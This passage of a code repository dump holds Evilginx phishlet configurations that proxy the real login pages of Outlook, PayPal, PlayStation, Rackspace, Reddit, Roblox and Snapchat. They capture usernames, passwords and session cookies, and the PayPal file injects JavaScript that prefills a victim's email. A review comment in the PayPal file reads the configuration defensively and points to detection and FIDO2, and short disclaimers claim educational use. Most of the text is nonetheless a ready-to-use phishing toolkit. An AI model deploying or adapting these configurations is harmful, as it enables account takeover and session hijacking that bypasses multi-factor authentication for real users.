domain: 'EXAMPLE.onelogin.com' 52 | path: '/login' 53 | -------------------------------------------------------------------------------- /phishlet_examples/outlook(o365).yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: true} 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false} 6 | - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']} 9 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 10 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 11 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 12 | - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 13 | - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 
'application/javascript']} 14 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 15 | - {triggers_on: 'account.live.com', orig_sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 16 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 17 | auth_tokens: 18 | - domain: '.live.com' 19 | keys: ['WLSSC','RPSSecAuth'] 20 | credentials: 21 | username: 22 | key: 'login' 23 | search: '(.*)' 24 | type: 'post' 25 | password: 26 | key: 'passwd' 27 | search: '(.*)' 28 | type: 'post' 29 | login: 30 | domain: 'outlook.live.com' 31 | path: '/owa/?nlp=1' 32 | -------------------------------------------------------------------------------- /phishlet_examples/outlook.yaml: -------------------------------------------------------------------------------- 1 | author: '@mrgretzky' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: true} 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false} 6 | - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']} 9 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 
'application/javascript']} 10 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 11 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 12 | - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 13 | - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 14 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 15 | - {triggers_on: 'account.live.com', orig_sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 16 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 17 | auth_tokens: 18 | - domain: '.live.com' 19 | keys: ['WLSSC'] 20 | credentials: 21 | username: 22 | key: 'login' 23 | search: '(.*)' 24 | type: 'post' 25 | password: 26 | key: 'passwd' 27 | search: '(.*)' 28 | type: 'post' 29 | login: 30 | domain: 'outlook.live.com' 31 | path: '/owa/?nlp=1' 32 | -------------------------------------------------------------------------------- /phishlet_examples/paypal.yaml: 
# NOTE(review): reading this configuration from the defending side.
# - proxy_hosts: every active entry reuses the real PayPal label as phish_sub
#   ('www', 'c', 'b.stats', 't', 'c6', 'hnd.stats'), so the same labels showing up
#   under an unrelated registrable domain in DNS, proxy or certificate-transparency
#   data are a usable detection signal.
# - auth_tokens: the key '.*,regexp' on '.paypal.com' is a match-all pattern, i.e.
#   every cookie for that domain is in scope, not one named session cookie. Response
#   to a suspected relay therefore has to end the account's active sessions; a
#   password reset alone presumably leaves replayed cookies usable - confirm with
#   the service's session handling.
# - auth_urls: '/myaccount/summary' and '/myaccount/.*' are post-sign-in paths;
#   presumably reaching one is what marks the session as authenticated.
# - credentials: read from the POST fields 'login_email' and 'login_password'.
# - js_inject: runs on www.paypal.com '/signin' when the lure carries an 'email'
#   parameter and writes that value into the '#email' input.
# - A one-time code or push approval entered on the proxied page is relayed like the
#   password; origin-bound authenticators (WebAuthn/FIDO2 passkeys) check the
#   hostname and are the control that does not relay.
-------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | # Email Params can be Triggered By using Below Command. 5 | # lures edit params ID email=test@email.com 6 | # Where ID is lure id number, and test@email.com is your known victim account email address for paypal. 7 | 8 | author: '@An0nud4y' 9 | min_ver: '2.3.0' 10 | proxy_hosts: 11 | - {phish_sub: 'www', orig_sub: 'www', domain: 'paypal.com', session: true, is_landing: true, auto_filter: true} 12 | - {phish_sub: '', orig_sub: '', domain: 'paypal.com', session: true, is_landing: false, auto_filter: true} 13 | # - {phish_sub: 'paypalobjects', orig_sub: 'www', domain: 'paypalobjects.com', session: false, is_landing: false} 14 | - {phish_sub: 'c', orig_sub: 'c', domain: 'paypal.com', session: false, is_landing: false} 15 | - {phish_sub: 'b.stats', orig_sub: 'b.stats', domain: 'paypal.com', session: false, is_landing: false} 16 | - {phish_sub: 't', orig_sub: 't', domain: 'paypal.com', session: false, is_landing: false} 17 | - {phish_sub: 'c6', orig_sub: 'c6', domain: 'paypal.com', session: false, is_landing: false} 18 | - {phish_sub: 'hnd.stats', orig_sub: 'hnd.stats', domain: 'paypal.com', session: false, is_landing: false} 19 | 20 | sub_filters: 21 | - {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 22 | - {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 23 | # - {triggers_on: 
'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 24 | # - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 25 | - {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 26 | - {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 27 | - {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 28 | - {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 29 | - {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 30 | - {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 
'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 31 | - {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 32 | - {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 33 | - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 34 | - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 35 | 36 | auth_tokens: 37 | - domain: '.paypal.com' 38 | keys: ['.*,regexp'] 39 | auth_urls: 40 | - '/myaccount/summary' 41 | - '/myaccount/.*' 42 | 43 | credentials: 44 | username: 45 | key: 'login_email' 46 | search: '(.*)' 47 | type: 'post' 48 | password: 49 | key: 'login_password' 50 | search: '(.*)' 51 | type: 'post' 52 | 53 | login: 54 | domain: 'www.paypal.com' 55 | path: '/signin' 56 | 57 | js_inject: 58 | - trigger_domains: ["www.paypal.com"] 59 | trigger_paths: ["/signin"] 60 | trigger_params: ["email"] 61 | script: | 62 | function lp(){ 63 | var email = document.querySelector("#email"); 64 | if (email != null && password != null) { 65 | email.value = "{email}"; 66 | return; 67 | } 68 | setTimeout(function(){lp();}, 100); 69 | } 70 | setTimeout(function(){lp();}, 100); 71 | 
-------------------------------------------------------------------------------- /phishlet_examples/playstation.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'id', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true} 5 | - {phish_sub: 'auth.api', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true} 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'playstation.com', session: true, is_landing: true} 7 | - {phish_sub: 'accounts.api', orig_sub: 'accounts.api', domain: 'playstation.com', session: true, is_landing: true} 8 | - {phish_sub: 'smetrics.aem', orig_sub: 'smetrics.aem', domain: 'playstation.com', session: true, is_landing: true} 9 | - {phish_sub: 'eventcom.api.np.km', orig_sub: 'eventcom.api.np.km', domain: 'playstation.net', session: true, is_landing: true} 10 | - {phish_sub: 'pdr-srlc.api', orig_sub: 'pdr-srlc.api', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true} 11 | 12 | #lengtmp+oszxh@gmail.com 13 | 14 | sub_filters: 15 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 16 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 17 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'www', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 
'application/x-javascript']} 18 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'accounts.api', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 19 | 20 | 21 | - {triggers_on: 'www.playstation.com', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 22 | - {triggers_on: 'www.playstation.com', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 23 | - {triggers_on: 'www.playstation.com', orig_sub: 'www', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 24 | 25 | 26 | auth_tokens: 27 | - domain: '.sonyentertainmentnetwork.com' 28 | keys: ['bm_sz,opt','_abck,opt','s_cc,opt','s_sq'] 29 | - domain: 'auth.api.sonyentertainmentnetwork.com' 30 | keys: ['JSESSIONID'] 31 | - domain: 'id.sonyentertainmentnetwork.com' 32 | keys: ['akacd_pdr-id2-sencom-bdl,opt'] 33 | 34 | credentials: 35 | username: 36 | key: 'username' 37 | search: '(.*)' 38 | type: 'post' 39 | password: 40 | key: 'password' 41 | search: '(.*)' 42 | type: 'post' 43 | login: 44 | domain: 'id.sonyentertainmentnetwork.com' 45 | path: '/signin/' 46 | -------------------------------------------------------------------------------- /phishlet_examples/rackspace.yaml: -------------------------------------------------------------------------------- 1 | 2 | author: '@An0nud4y' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 
'login', orig_sub: 'login', domain: 'rackspace.com', session: true, is_landing: true} 6 | - {phish_sub: '', orig_sub: '', domain: 'rackspace.com', session: true, is_landing: false} 7 | 8 | sub_filters: 9 | - {triggers_on: 'login.rackspace.com', orig_sub: 'login', domain: 'rackspace.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 10 | - {triggers_on: 'login.rackspace.com', orig_sub: '', domain: 'rackspace.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 11 | 12 | 13 | auth_tokens: 14 | - domain: 'login.rackspace.com' 15 | keys: ['.*,regexp'] 16 | auth_urls: 17 | - '' 18 | credentials: 19 | username: 20 | key: 'name="username"' 21 | search: '(.*)' 22 | type: 'post' 23 | password: 24 | key: 'name="password"' 25 | search: '(.*)' 26 | type: 'post' 27 | login: 28 | domain: 'login.rackspace.com' 29 | path: '/login' 30 | 31 | -------------------------------------------------------------------------------- /phishlet_examples/reddit.yaml: -------------------------------------------------------------------------------- 1 | author: '@customsync' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'reddit.com', session: true, is_landing: true} 5 | - {phish_sub: 'win', orig_sub: 'www', domain: 'redditstatic.com', session: false, is_landing: false} 6 | - {phish_sub: 'events', orig_sub: 'events', domain: 'reddit.com', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', 
replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 11 | - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 12 | - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'src="https://{hostname}', replace: 'src="https://{hostname}', mimes: ['text/html', 'application/json']} 13 | - {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 14 | - {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 15 | auth_tokens: 16 | - domain: '.reddit.com' 17 | keys: ['reddit_session'] 18 | credentials: 19 | username: 20 | key: 'username' 21 | search: '(.*)' 22 | type: 'post' 23 | password: 24 | key: 'password' 25 | search: '(.*)' 26 | type: 'post' 27 | login: 28 | domain: 'www.reddit.com' 29 | path: '/login' 30 | -------------------------------------------------------------------------------- /phishlet_examples/roblox.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 
3 | 4 | author: '@AN0NUD4Y' 5 | min_ver: '2.3.0' 6 | proxy_hosts: 7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'roblox.com', session: true, is_landing: true} 8 | - {phish_sub: '', orig_sub: '', domain: 'roblox.com', session: true, is_landing: false} 9 | - {phish_sub: 'assetgame', orig_sub: 'assetgame', domain: 'roblox.com', session: true, is_landing: false} 10 | - {phish_sub: 'auth', orig_sub: 'auth', domain: 'roblox.com', session: true, is_landing: false} 11 | - {phish_sub: 'metrics', orig_sub: 'metrics', domain: 'roblox.com', session: true, is_landing: false} 12 | - {phish_sub: 'realtime', orig_sub: 'realtime', domain: 'roblox.com', session: true, is_landing: false} 13 | - {phish_sub: 'apis', orig_sub: 'apis', domain: 'roblox.com', session: true, is_landing: false} 14 | - {phish_sub: 'locale', orig_sub: 'locale', domain: 'roblox.com', session: true, is_landing: false} 15 | - {phish_sub: 'accountsettings', orig_sub: 'accountsettings', domain: 'roblox.com', session: true, is_landing: false} 16 | - {phish_sub: 'js', orig_sub: 'js', domain: 'rbxcdn.com', session: true, is_landing: false} 17 | - {phish_sub: 'ecsv2', orig_sub: 'ecsv2', domain: 'roblox.com', session: true, is_landing: false} 18 | - {phish_sub: 'contacts', orig_sub: 'contacts', domain: 'roblox.com', session: true, is_landing: false} 19 | - {phish_sub: 'thumbnails', orig_sub: 'thumbnails', domain: 'roblox.com', session: true, is_landing: false} 20 | - {phish_sub: 'contacts', orig_sub: 'contacts', domain: 'roblox.com', session: true, is_landing: false} 21 | - {phish_sub: 'chat', orig_sub: 'chat', domain: 'roblox.com', session: true, is_landing: false} 22 | - {phish_sub: 'notifications', orig_sub: 'notifications', domain: 'roblox.com', session: true, is_landing: false} 23 | - {phish_sub: 'economy', orig_sub: 'economy', domain: 'roblox.com', session: true, is_landing: false} 24 | - {phish_sub: 'friends', orig_sub: 'friends', domain: 'roblox.com', session: true, is_landing: false} 25 | 26 | sub_filters: 
27 | - {triggers_on: 'www.roblox.com', orig_sub: '', domain: 'roblox.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 28 | - {triggers_on: 'www.roblox.com', orig_sub: '', domain: 'rbxcdn.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 29 | 30 | - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 31 | - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 32 | - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 33 | 34 | - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 35 | - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 
'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 36 | - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 37 | 38 | - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 39 | - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 40 | - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 41 | 42 | - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 43 | - {triggers_on: 
'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 44 | - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 45 | 46 | auth_tokens: 47 | - domain: '.roblox.com' 48 | keys: ['GuestData', '.ROBLOSECURITY','RBXSessionTracker','.*,regexp'] 49 | - domain: '.www.roblox.com' 50 | keys: ['gig_canary','gig_canary_ver' ,'.*,regexp'] 51 | 52 | auth_urls: 53 | - '/home' 54 | - '/home/.*' 55 | credentials: 56 | username: 57 | key: 'cvalue' 58 | search: '(.*)' 59 | type: 'post' 60 | password: 61 | key: 'password' 62 | search: '(.*)' 63 | type: 'post' 64 | custom: 65 | - key: 'ctype' 66 | search: '(.*)' 67 | type: 'post' 68 | 69 | login: 70 | domain: 'www.roblox.com' 71 | path: '/Login' -------------------------------------------------------------------------------- /phishlet_examples/snapchat.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 
3 | 4 | author: '@an0nud4y' 5 | min_ver: '2.3.0' 6 | proxy_hosts: 7 | - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'snapchat.com', session: true, is_landing: true} 8 | - {phish_sub: '', orig_sub: '', domain: 'snapchat.com', session: true, is_landing: false} 9 | - {phish_sub: 'www', orig_sub: 'www', domain: 'snapchat.com', session: true, is_landing: false} 10 | - {phish_sub: 'csp-central', orig_sub: 'csp-central', domain: 'appspot.com', session: true, is_landing: false} 11 | 12 | sub_filters: 13 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 14 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 15 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 16 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 17 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 18 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 19 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: 'https://{hostname}', replace: 
'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 20 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 21 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 22 | 23 | auth_tokens: 24 | - domain: '.snapchat.com' 25 | keys: ['sc-a-nonce', '.*,regexp'] 26 | - domain: 'accounts.snapchat.com' 27 | keys: ['web_client_id', 'sc-cookies-accepted', 'sc-a-csrf', 'sc-a-session', 'xsrf_token', '.*,regexp'] 28 | auth_urls: 29 | - '/accounts/welcome' 30 | credentials: 31 | username: 32 | key: 'username' 33 | search: '(.*)' 34 | type: 'post' 35 | password: 36 | key: 'password' 37 | search: '(.*)' 38 | type: 'post' 39 | login: 40 | domain: 'accounts.snapchat.com' 41 | path: '/accounts/login' 42 | -------------------------------------------------------------------------------- /phishlet_examples/steam.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 
